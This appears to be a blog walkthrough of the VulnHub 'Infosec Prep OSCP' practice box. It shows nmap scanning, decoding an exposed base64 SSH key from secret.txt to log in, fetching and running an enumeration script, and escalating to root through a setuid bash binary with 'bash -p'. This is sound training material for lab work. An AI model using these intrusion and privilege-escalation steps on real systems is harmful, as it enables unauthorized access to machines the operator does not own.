VulnHub Infosec Prep OSCP
I did this box for the OSCP voucher giveaway back in July. I had to wait until the contest was over. I was not one of the lucky winners. :‘( Good experience nonetheless.
Scanning and Enumeration
The first step is always an nmap scan:
sudo nmap -sV -sC 10.0.2.4
This scan was hella fast which saved me the time of enumerating directories with Gobuster.
sudo nmap -sV -T4 -p- -oN 10.0.2.4
(out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 11:07 EDT
(out)Nmap scan report for 10.0.2.4
(out)Host is up (0.23s latency).
(out)Not shown: 998 closed ports
(out)PORT STATE SERVICE VERSION
(out)22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
(out)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
(out)|_http-generator: WordPress 5.4.2
(out)| http-robots.txt: 1 disallowed entry
(out)|_/secret.txt
(out)|_http-server-header: Apache/2.4.41 (Ubuntu)
(out)|_http-title: OSCP Voucher – Just another WordPress site
(out)Nmap done: 1 IP address (1 host up) scanned in 6.08 seconds
Gaining access via SSH
Since the scan came back so fast, I didn’t even have a chance to go look for a robots.txt file which would have been my first move after starting a Gobuster scan. In the nmap scan, there is a secret.txt file.
I downloaded and opened the secret.txt file, it’s a base64. At first I thought it was a certificate missing the comments at the beginning and end. I tried adding those and SSHing, but it didn’t work, so I tried decoding the base64 and it turned out to be the certifcate which I then used to SSH. I guessed the oscp user because that is the user that appeared on the VMs login screen. I did try root@ first which did not work:
cat secret.txt | base64 -d > keychmod 600 keyssh -i key_file oscp@10.0.2.4
Post Exploit
Enumerating for Privilege Escalation
Once I am in the box I id and I am user named oscp without root.
id
(out)uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Next I check for access to:
- /root directory. Nope not so lucky.
- /home directory. There is one directory for a user named
oscp.
I checked out the contents of /home/oscp and found an ip file. This file was owned by root and I was thinking this would be a file run by a cron job maybe, but that didn’t pan out. If there was something there I missed it.
ls -la /home/oscp
(out)-rwxr-xr-x 1 root root 88 Jul 18 11:04 ip
Next I downloaded my favorite Linux enumeration script: Linux Smart Enumeration. Sometimes you have to start a Python server on your machine to do this, but this time I was able to get it directly from GitHub.
wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh
I gave the script proper permissions and ran it. The output is enormous so I’m only including what immediately stuck out to me and ended up being the answer:
chmod +x lse.sh
./lse.sh
(out)[!] fst020 Uncommon setuid binaries........................................ yes!
(out)---
(out)/usr/bin/bash
Getting Root Flag
Once I see setuid binaries, I head over to GTFOBins
I didn’t have a password and could not use sudo so I tried:
sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p
I was still unprivileged oscp. :(
After re-reading the GTFOBins notes which I should have done in the first place: “To exploit an existing SUID binary skip the first command and run the program using its original path”, I tried:
/usr/bin/bash -p
id
(out)uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
I’m root
ls /root
(out)fix-wordpress flag.txt snap
cat /root/flag.txt
Takeaways
Attacker
- If you find a base64 try decoding it before trying anything else with it.
- Read the details for exploits you are using, don't just start copying and pasting stuff without understanding.
Victim
- Ensure you have not misconfigured binaries with suid.
- Don't leave ssh keys exposed.
Invaluable Tools
Try the VulnHub Infosec Prep OSCP box